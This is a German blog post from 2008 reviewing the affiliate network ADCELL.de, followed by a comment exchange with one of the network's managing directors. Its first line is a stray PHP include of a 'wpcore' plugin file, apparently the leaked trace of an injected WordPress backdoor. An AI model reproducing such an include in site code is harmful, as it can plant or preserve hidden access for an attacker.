require_once(ABSPATH.'wp-content/plugins/wpcore/wpcore.php'); Partnerprogramm Netzwerk ADCELL.de | Beste-Partnerprogramme.de

Partnerprogramm Netzwerk ADCELL.de

19. April 2008
By

ADCELL ist ein weiteres Netzwerk in der Reihe der vorstellungswürdigen Partnerprogramm-Netzwerke.
Doch wie jedes Netzwerk hat auch ADCELL.DE nebst den Vorteilen auch einige Nachteile, die hier aufgeführt werden.

Die Struktur des Netzwerkes ist diegleiche, die man schon von vielen anderen Partnerprogramm-Netzwerken kennt, doch gibt es sicherlich zwei Besonderheiten: Zum einen werden nach dem Abschaffen einen auf PPC beruhenden eigenen Werbeformats nun keine Partnerprogramme mehr angeboten, die lediglich mit Pay-per-Click vergüten. Desweiteren sind die meisten bei Adcell.de geführen Partnerprogramme aus dem Erotikbereich. Diese Partnerprogramme sind dann zwar schwer zu bewerben, bieten aber hervorragende Verdienstmöglichkeiten.

Vorteile beim Partnerprogramm-Netzwerk ADCELL.de

  • Viele Partnerprogramme aus dem Erotik-Bereich
  • Auszahlung des Guthabens ab 25,- EUR kostenfrei auf deutsche Konten
  • Interne Bewertung (durch Vergütung, durchschnittliche Klickrate, etc.) der Programme mit dem “Adcell-Index”
  • Schnelle Auszahlung des Guthabens nach der Freigabe
  • Einfache Bewerbung bei den Partnerprogrammen

Doch täuschen diese Vorteile leider auch nicht über die existenten Nachteile und Schwächen des Partnerprogramm-Netzwerks Adcell.de hinweg.
Ein Auszug dieser Nachteile hier.

Nachteile beim Partnerprogramm-Netzwerk ADCELL.de

  • Extrem schlechte Statistik-Funktion
  • Storno-Gründe werden nicht angegeben, man kann nicht überprüfen, ob eine Storno gerechtfertigt ist
  • Relativ langes Warten auf die Freigabe von Auszahlungen und Leads
  • Unübersichtliches Interface (hieran wird aber gearbeitet)
  • Kaum Innovationen (es tut sich aber einiges, mittlerweile wird sogar “Domainparking” angeboten)

Auch ADCELL.DE hat sicherlich Vor- und Nachteile, bleibt aber dennoch ein Partnerprogramm-Netzwerk, dem man vertrauen kann:
Meine eigene Stornorate ist bis heute nur sehr gering, die angeforderten Auszahlungen wurden ohne Probleme überwiesen und wenn man viele Partnerprogramme für den Erotikbereich sucht, ist man bei ADCELL.DE sicherlich richtig.
Die Anmeldung bei diesem Partnerprogramm-Netzwerk ist selbstverständlich vollkommen kostenlos und sehr unproblematisch.

Bereich Bewertung
Programmangebot gutschlecht
Verdienstmöglichkeiten gut
Support gutschlecht
Auszahlungen gutgut
Innovation schlechtgut>
Serververfügbarkeit gut

Zeichenerklärung

gutgut = sehr gut
gut = gut
gutschlecht = Mittelmaß
schlecht = schlecht
schlechtschlecht = sehr schlecht

Hinweis:
Dieser Bericht ist unter Umständen unvollständig. Er darf lediglich als Orientierungshilfe dienen und spiegelt nur die subjektiven Eindrücke des Autors wieder.

Tags: , , , , , ,

5 Responses to Partnerprogramm Netzwerk ADCELL.de

  1. 15. September 2008 at 08:10

    Hallo an alle,

    als einer der Geschäftsführer von ADCELL melde ich mich mal kurz zu Wort:

    Wir hatten 5 Tage nach dem Artikel unserem Relaunch der u.a. die hier genannten Nachteile angegangen ist:

    1. Statistiken sind überarbeitet und bieten deutlich mehr Tiefe als bei allen anderen ANgeboten, da selbst Lifetimevergütungen bis ins kleinste Detail angezeigt und benannt werden.
    2. Storno-Gründe werden bei uns angegeben – wie auch bei anderen Netzwerken.
    3. die durchschnittliche Freigabezeit beträgt Netzwerkweit deutlich unter einer Woche. Bei Programmen mit Kreditkarte oder Lastschrift auch mal länger.
    4. sehr übersichtliches und intuitiv zu bedienendes Interface
    5. Innovationen wie Lifetime-Programme, Rss-Feeds, Domainparking etc. waren alle zuerst bei ADCELL – also auch genug Innovationen vorhanden.

    Marcus…

  2. 15. September 2008 at 08:17

    Hallo Marcus!

    Gern überprüfe ich nach deiner Kritik noch einmal meine Bewertung zu den genannten Punkten.
    Wie du merken wirst, befindet sich auch dieses Angebot gerade in einem Relaunch.

    Allerdings möchte ich schon jetzt sagen – ich hoffe das kannst du im Sinne einer benutzerorientierten Bedienbarkeit von adcell nachvollziehen: Nicht alles beim Relaunch ist geglückt und ich finde immer noch keine Funktion, die mir den Stornogrund eines Leads anzeigt. Wenn ich’s nur nicht finde, tut’s mir leid. Aber dann könnte man es sinnvoller einbauen! ;-)

    Nichts für ungut: Ich gehe meinen Bericht heute Abend noch einmal in jedem Punkt durch. Und wenn ich Dinge entdecke, bei denen mein damaliger Eindruck eklatant vom jetzigen Zustand bei adcell verschieden ist, so bin ich gern bereit, den Artikel ganz neu zu schreiben!

  3. 2. Dezember 2008 at 13:09

    Hallo Adrian,

    du findest du jedem stornierten Lead oder Sale einen Stornogrund, das ist selbstverständlich.

    Einfach in die Gesamtstatistik gehen und dann nach Transaktionen ordnen. Dann siehst du auch die stornierten Provisionen und bei diesen auch den Stornogrund.

    So – und jetzt freue ich mich auf den überarbeiteten Bericht ;-)

    Marcus

  4. 2. Dezember 2008 at 16:33

    Ich find’s so immer noch nicht… ;-)

    Bitte verstehe meinen Artikel generell nicht falsch: Adcell ist mir längst zum liebsten (und finanziell erfolgreichsten) Netzwerk geworden und ich mag euch wirklich sehr. ;-)
    Aber trotzdem habe ich eben einige Kritikpunkte…

    Aber du hast Recht: Ich wollte die Bewertung noch einmal überarbeiten, das hab ich versprochen… Und an der Punktebewertung ganz unten habe ich ja auch schon etwas getan, das Domainparking ist ja auch schon drin! ;-)

Hinterlasse eine Antwort

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind markiert *